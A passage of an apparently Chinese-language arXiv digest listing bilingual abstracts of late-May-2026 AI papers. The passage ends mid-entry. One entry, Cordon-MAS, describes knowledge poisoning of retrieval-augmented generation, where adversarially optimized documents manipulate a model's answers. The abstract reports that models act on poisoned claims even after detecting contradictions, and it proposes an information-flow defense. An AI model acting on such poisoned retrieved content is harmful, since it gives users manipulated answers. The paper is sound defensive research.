生成式人工智能通过重构科学知识的生产和验证过程,重新定义了高等教育。这些系统并非中立;它们积极促进了非霸权认识论的边缘化。本研究借鉴教育科学、批判技术研究和残疾研究,证明训练数据集(主要来自英语和西方中心)强化了认知殖民性。残疾人的情况特别清晰地说明了这一现象。技术架构常常将这些个体限制在刻板的刻板印象中,或将他们排除在设计过程之外,导致双重边缘化。本文探讨了研究者与机器之间的混合是否可能维护认知多样性,同时承认当算法校正作为纯粹姑息策略时固有的结构性限制。

英文摘要

Generative artificial intelligence redefines higher education by restructuring the processes through which scientific knowledge is produced and validated. These systems are not neutral; they actively contribute to the marginalization of non-hegemonic epistemologies. This research draws upon educational sciences, critical technology studies, and disability studies to demonstrate that training datasets, which remain predominantly Anglophone and Western-centric, reinforce epistemic coloniality. The situation of persons with disabilities provides a particularly clear illustration of this phenomenon. Technological architectures frequently confine these individuals to reductive stereotypes or exclude them from the design process, leading to a double marginalization. This article examines whether a hybridization between the researcher and the machine might preserve epistemic plurality, while acknowledging the structural limitations inherent in algorithmic correction when used as a purely palliative strategy.

2605.26763 2026-05-27 cs.LG cs.AI 版本更新

Adversarial Training for Robust Coverage Network under Worst-case Facility Losses

对抗训练用于最坏设施损失下的鲁棒覆盖网络

Changhao Miao, Yuntian Zhang, Tongyu Wu, Fang Deng, Chen Chen

发表机构 * State Key Laboratory of Autonomous Intelligent Unmanned Systems, Beijing Institute of Technology(自主智能无人系统国家重点实验室,北京理工大学) School of AI, Beijing Institute of Technology(北京理工大学人工智能学院)

AI总结 针对最大覆盖选址-阻断问题,提出基于对抗学习的双智能体深度强化学习框架,实现高效求解与鲁棒决策。

详情
AI中文摘要

最大覆盖选址-阻断问题(MCLIP)是一个经典的双层优化问题,对于韧性基础设施规划至关重要,但计算上仍然难以处理。具体来说,上层确定设施位置以最大化覆盖范围,而下层执行最坏情况下的阻断以最小化覆盖范围。上下层之间的强耦合以及各自的高组合复杂性使得传统方法无效。为了弥补这一差距,我们提出了一种基于对抗学习的双智能体深度强化学习(DADRL)框架,包括对应于上层的选址智能体和对应于下层的阻断智能体。我们的贡献有三方面:(1)选址智能体同时针对不断演化的阻断智能体进行训练,使其有效捕捉上下层之间的动态竞争相互作用;(2)为了充分利用阻断智能体的学习能力,我们提出了一种基于替代的集成推理策略,利用训练好的阻断智能体作为高保真替代来指导选址智能体的决策;(3)在合成和真实世界数据集上的大量实验表明,与其他基线相比,我们的方法在保持高度竞争力的解质量的同时,实现了卓越的计算效率。此外,我们的DADRL框架对网络结构是模型无关的,而其底层的对抗学习范式在解决其他双层优化问题方面显示出强大的潜力。

英文摘要

The Maximal Covering Location-Interdiction Problem (MCLIP) is a classic bi-level optimization problem, which is fundamental to resilient infrastructure planning yet remains computationally intractable. Specifically, the upper level determines facility locations to maximize coverage, while the lower level executes worst-case interdiction to minimize the coverage. The strong coupling between the upper and lower levels, combined with their respective high combinatorial complexity, renders traditional methods ineffective. To bridge this gap, we propose a Dual-Agent Deep Reinforcement Learning (DADRL) framework based on adversarial learning, comprising a location agent corresponding to the upper level and an interdiction agent corresponding to the lower level. Our contributions are threefold: (1) The location agent is trained simultaneously against an evolving interdiction agent, making it effectively capture the dynamic competitive interplay between the upper and lower levels; (2) To fully exploit the learned capabilities of the interdiction agent, we propose a Surrogate-based Ensemble Inference Strategy that utilizes the trained interdiction agent as a high-fidelity surrogate to guide the decisions of location agent; (3) Extensive experiments on synthetic and real-world datasets demonstrate that our approach achieves superior computational efficiency while maintaining highly competitive solution quality compared to other baselines. Furthermore, our DADRL framework is model-agnostic to network structures, while its underlying adversarial learning paradigm demonstrates strong potential for solving other bi-level optimization problems.

2605.26754 2026-05-27 cs.CR cs.AI 版本更新

Cordon-MAS: Defending RAG against Knowledge Poisoning via Information-Flow Control

Cordon-MAS:通过信息流控制防御 RAG 的知识投毒

Zhe Yu, Wenpeng Xing, Gaolei Li, Shuguang Xiong, Hongzhi Wang, Xuyang Teng, Meng Han

发表机构 * Zhejiang University(浙江大学) Binjiang Institute of Zhejiang University(浙江大学滨江研究院) Shanghai Jiao Tong University(上海交通大学) Zhejiang Lab(浙江实验室) Harbin Institute of Technology(哈尔滨工业大学) Hangzhou Dianzi University(杭州电子科技大学)

AI总结 针对检索增强生成(RAG)中的 Confundo 式投毒攻击,提出 Cordon-MAS 框架,通过分离证据提取、跨源审计和答案合成到具有非对称内存权限的智能体中,将攻击成功率相对降低 92.4%,将投毒问题从检测重新定义为信息流控制。

详情
AI中文摘要

检索增强生成(RAG)日益支撑着高风险应用,但仍易受到 Confundo 式投毒攻击,其中对抗性优化的文档操纵生成的输出。现有防御假设检测到中毒证据即可防止危害。我们证明这一假设不正确:模型存在监控-控制差距——它们可以检测到检索证据中的矛盾,但仍会依据中毒声明行动。我们引入 Cordon 原则——任何能够进行最终合成的智能体都不得访问不可信的自然语言证据——并通过 CORDON-MAS 实现该原则,这是一个隔离框架,通过将证据提取、跨源审计和答案合成分离到具有非对称内存权限的智能体中,在架构上强制执行该原则。在五个 BEIR 数据集上,CORDON-MAS 相对于未防御的 RAG 将攻击成功率降低了 92.4%。这将 RAG 投毒问题从检测问题重新定义为信息流控制问题。

英文摘要

Retrieval-augmented generation (RAG) increasingly underpins high-stakes applications, yet remains vulnerable to Confundo-style poisoning where adversarially optimized documents manipulate generated outputs. Existing defenses assume that detecting poisoned evidence prevents harm. We show this assumption is incorrect: models exhibit a monitoring-control gap -- they can detect contradictions in retrieved evidence yet still act on poisoned claims. We introduce the Cordon Principle -- no agent capable of final synthesis may access untrusted natural-language evidence -- and realize it through CORDON-MAS, a compartmentalized framework that enforces this principle architecturally by separating evidence extraction, cross-source audit, and answer synthesis into agents with asymmetric memory privileges. Across five BEIR datasets, CORDON-MAS reduces attack success rate by 92.4\% relative to undefended RAG. This reframes RAG poisoning from a detection problem to an information-flow control problem.

2605.26747 2026-05-27 cs.AI 版本更新

A Dataset of Robot-Patient and Doctor-Patient Medical Dialogues for Spoken Language Processing Tasks

面向口语处理任务的机器人-患者与医生-患者医疗对话数据集

Heriberto Cuayahuitl, Grace Jang

发表机构 * UK’s NHS(英国国家医疗服务体系)

AI总结 提出MeDial-Speech数据集,包含机器人-患者和医生-患者的真实医疗对话语音数据,用于训练和评估医疗AI,并通过句子选择基准测试评估三个大语言模型。

详情
Journal ref
IEEE International Conference on Acoustics, Speech, and Signal Processing (ICASSP-2026)
AI中文摘要

大型语言模型(LLM)为人工智能(AI)带来了巨大改进,可应用于通用任务。然而,它们在文本或口语医疗咨询中的应用仍是一个开放的研究问题。本文提出MeDial-Speech,这是一个新颖的语音数据集,用于训练和评估能够与患者进行咨询的医疗AI。该数据集在真实环境中从机器人-患者和医生-患者对话中收集,包含111小时以上的语音数据(无数据增强),涵盖四种健康状况:路易体痴呆、心力衰竭、肩痛和心绞痛。此外,我们通过句子选择(20个选项)提出了一个对话基准,用于评估三个最先进的LLM:GPT-5 mini、DeepSeek-V3和Claude Sonnet 4。实验结果显示,Claude Sonnet 4在句子选择中表现最佳,使用人工转录的准确率为71.1%,使用自动转录的准确率为74.7%,并且所有LLM在其概率预测中高度过度自信,无论选择医疗对话中的正确或错误句子。该数据集对非商业用途免费提供,网址为:https://huggingface.co/datasets/hcuayahu/MeDial-Speech

英文摘要

Large Language Models (LLMs) have brought huge improvements to Artificial Intelligence (AI), which can be applied to general-purpose tasks. However, their application to textual or spoken medical consultations is still an open research problem. This paper proposes MeDial-Speech, a novel speech dataset for training and evaluating Med-AIs that can carry out consultations with patients. It was collected in realistic environments from robot-patient and doctor-patient dialogues, contains 111+ hours of speech data (without data augmentation), and covers four health conditions: Lewy body dementia, heart failure, shoulder pain, and angina. In addition, we propose a dialogue benchmark via sentence selection (with 20 options) to evaluate three state-of-the-art LLMs: GPT-5 mini, DeepSeek-V3, and Claude Sonnet 4. Experimental results reveal that Claude Sonnet 4 is the best in sentence selection, with 71.1% accuracy using manual transcriptions and 74.7% using automatic transcriptions, and that all LLMs are highly overconfident in their probabilistic predictions, regardless of selecting correct or incorrect sentences in medical dialogues. This dataset is free of charge for non-commercial purposes at: https://huggingface.co/datasets/hcuayahu/MeDial-Speech

2605.26741 2026-05-27 cond-mat.mtrl-sci cs.AI 版本更新

MatFormBench: A Benchmarking Evaluation Framework for Target-Driven Materials Formulation

MatFormBench: 一个面向目标驱动材料配方的基准评估框架

Linhan Wu, Chenxi Wang, Chuhan Yang, Zhengwei Yang, Yuyang Liu

发表机构 * DeepVerse

AI总结 针对现有材料机器学习基准仅关注正向属性预测而缺乏逆向优化评估的问题,提出MatFormBench基准框架,集成物理驱动配方生成方案与多维度评分指标,系统评估39种逆向设计算法。

Comments 26 pages

详情
AI中文摘要

材料的逆向设计显著推进了目标驱动的配方优化,然而现有的材料机器学习基准仍局限于正向属性预测,未能系统评估逆向优化和生成算法,这一关键差距阻碍了目标驱动材料设计的进展。为解决这一局限性,我们提出了MatFormBench,一个新颖的基准评估生态系统,专门用于评估和指导目标驱动配方的生成策略。MatFormBench集成了一个物理驱动的配方生成方案,用于生成忠实模拟真实材料结构-属性响应关系的合成样本,并辅以五个递增难度级别来量化这些关系的复杂性。为了严格评估算法性能,我们进一步提出了MatFormScore,一个多维指标,全面量化五个关键轴上的性能:目标成功率、搜索效率、探索能力、鲁棒性和稳定性。我们通过评估39种不同的逆向设计算法来验证MatFormBench,涵盖经典的代理辅助黑箱搜索、最先进的深度生成模型以及日益流行的基于大语言模型(LLM)的推荐策略。在1170次标准化算法-任务评估中,基于扩散的模型展现出最强的整体性能,而基于变分自编码器(VAE)和遗传算法(GA)的方法在特定场景中表现出独特优势。通过为目标驱动材料配方建立统一的评估标准,MatFormBench实现了可重复的基准测试、原则性的算法比较和逆向设计策略的诊断分析,为推进材料逆向设计提供了基础工具。

英文摘要

Inverse design of materials has significantly advanced target-driven formulation optimization, yet existing materials machine learning benchmarks remain limited to forward property prediction, failing to systematically evaluate inverse optimization and generation algorithms, a critical gap that hinders the progress of target-driven materials design. To address this limitation, we propose MatFormBench, a novel benchmarking ecosystem tailored to evaluate and guide generative strategies for target-driven formulation. MatFormBench integrates a physics-driven formulation generation scheme to generate synthetic samples that faithfully emulate realistic materials structure-property response relationships, complemented by five escalating difficulty levels to quantify the complexity of these relationships. To rigorously assess algorithm performance, we further propose MatFormScore, a multi-dimensional metric that comprehensively quantifies performance across five critical axes: target success, search efficiency, exploratory capacity, robustness, and stability. We validate MatFormBench by evaluating 39 diverse inverse design algorithms, covering classical surrogate-assisted black-box search, state-of-the-art deep generative models, and increasingly popular Large Language Model (LLM)-based recommendation strategies. Across 1170 standardized algorithm-task evaluations, diffusion-based models demonstrate the strongest overall performance, while Variational Autoencoder (VAE)-based and Genetic Algorithm (GA)-based methods exhibit distinct advantages in specific scenarios. By establishing a unified evaluation standard for target-driven materials formulation, MatFormBench enables reproducible benchmarking, principled algorithm comparison, and diagnostic analysis of inverse design strategies, providing a foundational tool for advancing materials inverse design.

2605.26733 2026-05-27 cs.LG cs.AI 版本更新

Stabilizing Recurrent Dynamics for Test-Time Scalable Latent Reasoning in Looped Language Models

循环语言模型中测试时可扩展潜在推理的稳定循环动力学

Xiao-Wen Yang, Ziyu Han, Xi-Hua Zhang, Wen-Da Wei, Jie-Jing Shao, Lan-Zhe Guo, Yu-Feng Li

发表机构 * State Key Laboratory of Novel Software Technology, Nanjing University, Nanjing, China(新型软件技术国家重点实验室,南京大学,南京,中国) School of Artificial Intelligence, Nanjing University, Nanjing, China(人工智能学院,南京大学,南京,中国) School of Intelligence Science and Technology, Nanjing University, Nanjing, China(智能科学与技术学院,南京大学,南京,中国)

AI总结 提出STARS训练框架,通过雅可比谱半径正则化约束潜在状态趋近渐近稳定不动点,解决循环语言模型深度递归时性能崩溃问题,实现可靠的测试时扩展并提升峰值性能。

Comments ICML 2026

详情
AI中文摘要

循环语言模型(LoopLMs)通过深度递归实现高效的潜在推理,但表现出不可靠的测试时缩放行为:性能通常在某个迭代深度达到峰值,然后随着进一步递归而崩溃。通过潜在动力学分析,我们发现现有架构和策略在稳定性和有效性之间存在固有的权衡。通过将推理概念化为不确定性减少,我们提出收敛到稳定不动点同时保持有效性是一种有前景的方法。为此,我们提出了STARS(稳定性驱动的递归缩放),一种训练框架,约束潜在状态趋近渐近稳定不动点。这通过高效的雅可比谱半径正则化和随机循环采样实现,使STARS能够在确保严格稳定性的同时最大化有效性。在算术任务上的实验表明,STARS实现了可靠的测试时缩放,在复杂数学推理中,它显著减轻了随着递归深度增加而出现的性能退化,同时提高了峰值性能。

英文摘要

Looped Language Models (LoopLMs) enable efficient latent reasoning through depth recurrence, yet exhibit unreliable test-time scaling behavior: performance often peaks at a certain iteration depth and then collapses with further recurrence. Through latent dynamics analysis, we find an inherent trade-off between stability and effectiveness in existing architectures and strategies. By conceptualizing reasoning as uncertainty reduction, we propose that convergence toward stable fixed points while preserving effectiveness represents a promising way. To this end, we propose STARS (STAbility-driven Recurrent Scaling), a training framework that constrains latent states to approach asymptotically stable fixed points. This is realized via efficient Jacobian Spectral Radius Regularization with random loop sampling, enabling STARS to maximize effectiveness while ensuring rigorous stability. Experiments on arithmetic tasks show that STARS achieves reliable test-time scaling, and on complex mathematical reasoning it substantially mitigates performance degradation as recurrence depth increases while also improving peak performance.

2605.26731 2026-05-27 cs.AI cs.CL 版本更新

It's Not the Capability: Harness Sensitivity Is Non-Monotone Across LLM Agent Tiers

不是能力问题:LLM 智能体层级间的驾驭敏感性非单调

Yong-eun Cho

发表机构 * KailosLab(凯罗斯实验室)

AI总结 通过 432 次实验,发现 LLM 智能体的驾驭敏感性随模型层级非单调变化,且依赖模型类型(聊天 vs. 推理),推翻了“更高能力模型需要更少结构指导”的假设。

Comments 9 pages, 3 figures

详情
AI中文摘要

LLM 智能体部署中的一个普遍假设是,更结构化的驾驭方式普遍能提高可靠性,并且能力更强的模型需要成比例地减少结构指导——这共同暗示了模型能力层级与最优驾驭复杂度之间存在单调反比关系。我们通过一个受控的 432 次实验来检验这一假设,实验跨越了四个能力层级的六个模型,在 HEAT-24(一个基于 git 工作区验证的 24 任务合成基准)上采用了三种驾驭条件(轻量、平衡、严格)。我们的结果从两个方面反驳了单调反比关系。首先,对于评估的前沿聊天模型(Gemini 2.5 Flash),增加驾驭冗长度使 VTSR 降低 29-38 个百分点——这是一个驾驭复杂度悖论。其次,对于评估的前沿推理模型(Qwen3.5-122B,启用扩展思考),严格驾驭实现了最高的 VTSR(91.7%)和最低的延迟,与预测相反。在受限层级内,一个 2B 模型(Gemma4:e2B)在所有驾驭条件下均以 91.7% 的 VTSR 达到了强开放层级的稳定性。由于本研究中每个层级仅由一个模型代表,这些结果应解释为模型特定的观察;驾驭敏感性在所评估的模型中呈现非单调性,并且关键依赖于模型类型(聊天 vs. 推理)。我们引入了一个六标签失败分类法,显示格式违规主导了能力强的模型失败,而错误文件主导了低能力失败,并推导出了实用的层级感知驾驭选择指南。

英文摘要

A prevalent assumption in LLM agent deployment holds that more structured harnesses universally improve reliability, and that higher-capability models need proportionally less structural guidance -- together implying a monotone inverse relationship between model capability tier and optimal harness complexity. We test this hypothesis through a controlled 432-run experiment crossing six models across four capability tiers with three harness conditions (light, balanced, strict) on HEAT-24, a 24-task synthetic benchmark with git-based workspace verification. Our results refute the monotone inverse relationship on two fronts. First, for the frontier chat model evaluated (Gemini 2.5 Flash), increased harness verbosity lowers VTSR by 29-38 percentage points -- a harness-complexity paradox. Second, for the frontier reasoning model evaluated (Qwen3.5-122B, extended thinking enabled), strict harness achieves the highest VTSR (91.7%) and the lowest latency, the opposite of the prediction. Within the constrained tier, a 2B model (Gemma4:e2B) matches strong-open-tier stability at 91.7% across all harnesses. Because each tier is represented by a single model in this study, these results should be interpreted as model-specific observations; harness sensitivity appears non-monotone across the models evaluated, and depends critically on model type (chat vs. reasoning). We introduce a six-label failure taxonomy showing that format_violation dominates capable-model failures while wrong_file dominates low-capability failures, and we derive practical tier-aware harness selection guidelines.

2605.26726 2026-05-27 eess.IV cs.AI cs.CV 版本更新

Measuring Prediction Uncertainty in Neural Cellular Automata

神经细胞自动机中的预测不确定性测量

Ario Sadafi, Michael Deutges, Nassir Navab, Carsten Marr

发表机构 * Computational Health Center, Helmholtz Munich, Neuherberg, Germany(赫尔姆霍茨慕尼黑计算健康中心) Helmholtz AI, Helmholtz Munich, Neuherberg, Germany(赫尔姆霍茨慕尼黑人工智能研究所) Computer Aided Medical Procedures, Technical University of Munich, Munich, Germany(慕尼黑技术大学计算机辅助医疗程序研究所) Munich Center for Machine Learning, Munich, Germany(慕尼黑机器学习中心) Department of Medicine III, Ludwig-Maximilian-University Hospital, Munich, Germany(慕尼黑路德维希-马克西米利安大学医院第三医学部) Department of Physics, University of Munich, Munich, Germany(慕尼黑大学物理系) German Cancer Consortium (DKTK), partner site Munich, Germany(德国癌症研究中心(DKTK)慕尼黑分部)

AI总结 提出一种基于动态系统收敛性的不确定性度量方法,通过扰动自动机状态并观察预测稳定性来评估神经细胞自动机在医学图像分割中的可信度。

Comments Accepted for publication at the 29th International Conference on Medical Image Computing and Computer Assisted Intervention - MICCAI 2026

详情
AI中文摘要

神经细胞自动机(NCA)为编码器-解码器分割网络提供了一种轻量级替代方案。然而,决定何时应信任预测可能很困难。在这里,我们研究基于NCA的医学图像分割的不确定性估计,无需修改底层架构或重新训练模型。我们的方法通过将NCA视为一个动态系统来激发,其中收敛吸引子对应于可信预测。具体地,我们提出了弹性(resilience),这是一种简单的度量,通过探测在自动机状态微小扰动下最终预测的稳定性来利用NCA固有的迭代结构。返回相同解的预测被认为是可信的,而显著变化的预测被标记为不确定。我们使用选择性预测指标($\Delta$Dice@90和AURC)和排序指标(AUROC和AUPRC)通过其预测分割质量的能力来评估不确定性。在多个医学分割基准测试中,弹性比基线更可靠地识别失败案例,提高了基于NCA模型的信任度和安全性。

英文摘要

Neural cellular automata (NCA) provide a lightweight alternative to encoder-decoder segmentation networks. However, it can be difficult to decide when a prediction should be trusted. Here, we study uncertainty estimation for NCA-based medical image segmentation without modifying the underlying architecture or retraining the model. Our approach is motivated by viewing the NCA as a dynamical system where convergent attractors correspond to confident predictions. Concretely, we propose resilience, a simple measure that leverages the intrinsic iterative structure of NCAs by probing the stability of the final prediction under small perturbations of the automaton state. Predictions that return to the same solution are deemed confident, while those that change substantially are flagged as uncertain. We evaluate uncertainty by its ability to predict segmentation quality using selective prediction metrics ($Δ$Dice@90 and AURC) and ranking metrics (AUROC and AUPRC). Across multiple medical segmentation benchmarks, resilience identifies failure cases more reliably than baselines, improving trust and safety in NCA-based models.

2605.26720 2026-05-27 cs.AI 版本更新

Towards Feedback-to-Plan Decisions for Self-Evolving LLM Agents in CUDA Kernel Generation

面向CUDA内核生成中自进化LLM代理的反馈到计划决策

Yee Hin Chong, Jiaming Wu, Youhui Zhang, Peng Qu

发表机构 * Department of Computer Science and Technology, Tsinghua University, Beijing, China(清华大学计算机科学与技术系) Beijing National Research Center for Information Science and Technology, Beijing, China(北京信息科学国家研究中心)

AI总结 通过轨迹冻结和选择性反馈注入,提出CUDAnalyst框架以归因规划决策对反馈组件的贡献,揭示显式规划仅在反馈对齐时有效,且有效规划源于结构化多反馈交互。

Comments ICML 2026 accpeted, camera-ready in progress

详情
AI中文摘要

大型语言模型(LLMs)作为自进化代理在CUDA内核生成中展现出强大的实证收益,这得益于跨代际的反馈条件规划。然而,规划决策如何归因并组合异构反馈信号仍不透明。标准的端到端消融无法解决这一问题,因为迭代规划放大了早期扰动,并将反馈效应与轨迹依赖漂移混为一谈。我们引入 exttt{CUDAnalyst},一个统一的分析层,通过轨迹冻结和选择性反馈注入,实现对规划决策到反馈组件的受控、代际级归因。 exttt{CUDAnalyst}支持稳定的代际级评估和原则性的联盟式反馈效应及交互归因。我们的结果表明,显式规划仅在反馈对齐时有益,有效规划源于结构化的多反馈交互,且来自更强推理模型的高级规划可部分迁移至较弱模型。这些趋势在参考骨干网络、代表性工作负载和参考归纳机制中保持一致,表明在所研究的受控轴内,识别出的反馈到规划结构是稳健的。

英文摘要

Large language models (LLMs) have shown strong empirical gains as self-evolving agents for CUDA kernel generation, driven by feedback-conditioned planning across generations. However, how planning decisions attribute and combine heterogeneous feedback signals remains opaque. Standard end-to-end ablations fail to resolve this question, as iterative planning amplifies early perturbations and conflates feedback effects with trajectory-dependent drift. We introduce \texttt{CUDAnalyst}, a unified analysis layer for controlled, generation-level attribution of planning decisions to feedback components via trajectory freezing and selective feedback injection. \texttt{CUDAnalyst} enables stable generation-level evaluation and principled coalitional-style attribution of feedback effects and interactions. Our results show that explicit planning is beneficial only when feedback is aligned, that effective planning emerges from structured multi-feedback interactions, and that high-level plans from stronger reasoning models can partially transfer to weaker ones. These trends hold across reference backbones, representative workloads, and reference induction regimes, indicating that the identified feedback-to-plan structure is robust within the controlled axes studied.

2605.26717 2026-05-27 cs.IR cs.AI 版本更新

L2Rec: Towards Dual-View Understanding of LLMs for Personalized Recommendation

L2Rec:面向个性化推荐的LLM双视图理解

Pingjun Pan, Tingting Zhou, Peiyao Lu, Tingting Fei, Hongxiang Chen, Chuanjiang Luo

发表机构 * Netease Cloud Music(网易云音乐)

AI总结 提出L2Rec方法,通过双视图个性化混合专家机制在参数层面统一行为与语义理解,实现端到端个性化推荐,实验证明优于现有方法。

Comments Accepted at SIGIR 2026

详情
AI中文摘要

将大型语言模型(LLM)适配于个性化推荐需要将其通用能力与用户特定偏好对齐,同时有效利用行为信号和语义信号。现有方法通常在输入层(例如,将行为嵌入注入令牌空间)或输出层(例如,独立编码器的对比对齐)整合这些信号,存在分布差距或缺乏端到端任务监督。在这项工作中,我们引入了L2Rec,它在LLM的参数层面统一了行为和语义理解。我们的关键洞察是,同一组Transformer参数可以作为两个视图的共享媒介:通过双视图个性化混合专家(DPMoE)机制应用视图特定的个性化低秩扰动,L2Rec使得单个LLM主干能够为每个用户产生互补的行为和语义适应,且表示层面的不对齐最小化。一个自适应跨视图融合模块进一步将双视图输出整合为统一的用户偏好。在四个数据集上的实验表明,L2Rec持续优于最先进的基线方法,并且在大型工业平台上的在线A/B测试验证了关键参与指标的显著改进。

英文摘要

Adapting large language models (LLMs) for personalized recommendation requires aligning their general-purpose capabilities with user-specific preferences while effectively leveraging both behavioral and semantic signals. Existing approaches typically integrate these signals at either the input level (e.g., injecting behavioral embeddings into the token space) or the output level (e.g., contrastive alignment of separate encoders), suffering from distribution gaps or lack of end-to-end task supervision. In this work, we introduce L2Rec, which unifies behavioral and semantic understanding at the parameter level of LLMs. Our key insight is that the same set of Transformer parameters can serve as a shared medium for both views: by applying view-specific, personalized low-rank perturbations via a Dual-view Personalized Mixture-of-Experts (DPMoE) mechanism, L2Rec enables a single LLM backbone to produce complementary behavioral and semantic adaptations for each user with minimal representation-level misalignment. An adaptive cross-view fusion module further integrates the dual-view outputs into a unified user preference. Experiments on four datasets show that L2Rec consistently outperforms state-of-the-art baselines, and online A/B testing on a large-scale industrial platform validates significant improvements in key engagement metrics.

2605.25507 2026-05-27 cs.AI 版本更新

Credit Assignment with Resets in Language Model Reasoning

语言模型推理中带有重置的信用分配

Ankur Samanta, Akshayaa Magesh, Ayush Jain, Youliang Yu, Daniel Jiang, Kavosh Asadi, Kaveh Hassani, Paul Sajda, Jalaj Bhandari, Yonathan Efroni

发表机构 * Meta AI Columbia University(哥伦比亚大学) Meta Superintelligence Labs(Meta超智能实验室) Tel Aviv University(特拉维夫大学)

AI总结 提出随机重置策略优化(RRPO)和自重置策略优化(SRPO)两种方法,通过重置到中间状态并重新采样反事实延续来改进语言模型多步推理中的信用分配,SRPO在多个推理基准上优于标准GRPO和RRPO。

详情
AI中文摘要

当代使用可验证奖励方法的强化学习通过对轨迹中的所有令牌统一分配单一结果奖励来对多步推理进行语言模型后训练。这种统一分配忽略了哪些步骤促成了成功或失败。改进信用分配可以通过实现对错误推理步骤的针对性细化来解决这一限制,而不是统一更新整个轨迹。重置是一种简单的机制,通过返回到中间状态并重新采样反事实延续来实现更精确的信用分配,从而将结果差异归因于该点做出的决策。我们提出了两种这样的方法:随机重置策略优化(RRPO),其中重置状态从推理步骤中随机抽取;以及自重置策略优化(SRPO),其中模型自我定位错误轨迹中的错误步骤并在此重置。我们在保守策略迭代(CPI)框架内分析了这些方法。通过针对可改进状态的信用分配预言机扩展CPI,相比于随机重置可证明改进。在多个模型和推理基准上,SRPO通过仅在自我定位的重置处采样多个后缀延续并从其奖励中学习,仅使用模型本身且无需外部监督,始终优于标准GRPO和RRPO。

英文摘要

Contemporary reinforcement learning with verifiable reward methods post-train language models on multi-step reasoning by assigning a single outcome reward uniformly across all tokens in a trajectory. Such uniform assignment ignores which steps contributed to success or failure. Improving credit assignment can address this limitation by enabling targeted refinement of faulty reasoning steps, rather than updating entire trajectories uniformly. Resets are one such simple mechanism, enabling more precise credit assignment by returning to an intermediate state and resampling counterfactual continuations, so that outcome differences can be attributed to decisions made at that point. We propose two such methods: Random-Reset Policy Optimization (RRPO), where reset states are drawn randomly from reasoning steps, and Self-Reset Policy Optimization (SRPO), where the model self-localizes the erroneous step in an incorrect trajectory and resets there. We analyze these methods within the Conservative Policy Iteration (CPI) framework. Extending CPI with a credit-assignment oracle that targets improvable states yields provable improvements over random resets. Across models and reasoning benchmarks, SRPO consistently outperforms standard GRPO and RRPO by sampling multiple suffix continuations at a self-localized reset and learning from their rewards, using only the model itself with no external supervision.

2605.25281 2026-05-27 cs.CL cs.AI 版本更新

READER: Reasoning-Enhanced AI-Generated Text Detection

READER: 增强推理的AI生成文本检测

Pingfan Su, Kai Ye, Shijin Gong, Erhan Xu, Jin Zhu, Giulia Livieri, Chengchun Shi

发表机构 * School of Mathematics, University of Birmingham(布里斯托尔大学数学学院)

AI总结 提出READER方法,通过微调1.5B参数的LLM在结构化推理数据集READ上,结合推理与检测,在分布偏移下优于GPT-5.2等大100-1000倍的模型。

详情
AI中文摘要

近年来,大型语言模型(LLMs)的进步使得区分人类撰写的文本与AI生成的内容变得越来越困难。许多现有的检测器训练有监督的神经分类器,这些分类器在分布内表现强劲,但通常不透明,且在分布偏移下性能可能大幅下降。我们提出READER,一种增强推理的AI文本检测器,它输出人类/AI标签以及描述其决策证据的结构化理由。我们方法的一个关键组成部分是READ,一个包含理由和判决的精心策划的监督集。我们在READ上微调一个LLM以构建READER,该检测器在推理时先推理再检测。尽管只有1.5B参数,READER始终优于现有检测器以及提示式的高容量LLM基线(GPT-5.2、Gemini-3-Pro和DeepSeek-V3.2),这些基线的规模大100到1000倍。

英文摘要

Recent advances in large language models (LLMs) have made it increasingly difficult to distinguish human-written text from AI-generated content. Many existing detectors train supervised neural classifiers that achieve strong in-distribution performance but are often opaque and can degrade substantially under distribution shift. We present READER, a reasoning-enhanced AI text detector that outputs both a human/AI label and a structured rationale describing the evidence for its decision. A key component of our approach is READ, a curated supervision set of rationales and verdicts. We fine-tune an LLM on READ to build READER, which reasons before detecting at inference time. Despite having only 1.5B parameters, READER consistently outperforms existing detectors as well as prompted, high-capacity LLM baselines (GPT-5.2, Gemini-3-Pro, and DeepSeek-V3.2), which are 100 to 1000 times larger in scale.

2605.24636 2026-05-27 cs.AI cs.CL 版本更新

GlobalDentBench: A Multinational Benchmark for Evaluating LLM Clinical Reasoning in Dentistry with Expert Calibration

GlobalDentBench:一个用于评估牙科领域大语言模型临床推理能力并包含专家校准的多国基准

Junjie Zhao, Jingyi Liang, Zhenyang Cai, Jiaming Zhang, Zhenwei Wen, Shuzhi Deng, Wenjing Yi, Chunfeng Luo, Hexian Zhang, Junying Chen, Tianrui Liu, Zhuhui Bai, Zixu Zhang, Pradeep Singh, Xiang Liu, Jianquan Li, Nhan L Tran, Falk Schwendicke, Zuolin Jin, Lijian Jin, Liangyi Chen, Wei-fa Yang, Benyou Wang, Junwen Wang, Shan Jiang

发表机构 * Division of Applied Oral Sciences and Community Dental Care, Faculty of Dentistry, The University of Hong Kong(香港大学牙科学院应用口腔科学与社区牙科护理系) School of Data Science, The Chinese University of Hong Kong, Shenzhen(香港中文大学(深圳)数据科学学院) School of Artificial Intelligence, The Chinese University of Hong Kong, Shenzhen(香港中文大学(深圳)人工智能学院) Department of Periodontology, Shenzhen Stomatology Hospital (Pingshan) of Southern Medical University, Shenzhen, China(南方医科大学深圳口腔医院(平山)牙周科) Beijing Institute of Collaborative Innovation(北京协同创新研究院) Department of Orthodontics, Shenzhen Stomatology Hospital (Pingshan) of Southern Medical University, Shenzhen, China(南方医科大学深圳口腔医院(平山)正畸科) Shenzhen Stomatology Hospital (Pingshan) of Southern Medical University, Shenzhen, China(南方医科大学深圳口腔医院(平山)) College of Future Technology, Peking University(北京大学未来技术学院) Freedom AI New Cornerstone Science Laboratory, National Biomedical Imaging Center, State Key Laboratory of Membrane Biology, Institute of Molecular Medicine, Peking-Tsinghua Center for Life Sciences, College of Future Technology, Peking University, Beijing 100871, China(新基石科学实验室、国家生物医学成像中心、膜生物学国家重点实验室、分子医学研究院、北京大学未来技术学院、生命科学中心,北京大学,北京100871,中国) IDG/McGovern Institute for Brain Research, Peking University, Beijing 100871, China(IDG/ McGovern脑科学研究院,北京大学,北京100871,中国) Division of Oral and Maxillofacial Surgery, Faculty of Dentistry, The University of Hong Kong(香港大学牙科学院口腔颌面外科系) Shenzhen Loop Area Institute(深圳环城区域研究所) Department of Cancer Biology, Mayo Clinic Arizona, 5777 E. Mayo Blvd., IERB-3-504A, Phoenix, Arizona, 85054, USA(梅奥诊所亚利桑那分部癌症生物学部门,5777 E. Mayo Blvd., IERB-3-504A, Phoenix, Arizona, 85054, USA) Department of Conservative Dentistry, Periodontology and Digital Dentistry, LMU University Hospital, LMU Munich, Munich, Germany(慕尼黑大学医院保守牙科、牙周病学和数字牙科部门,慕尼黑,德国,慕尼黑大学) Division of 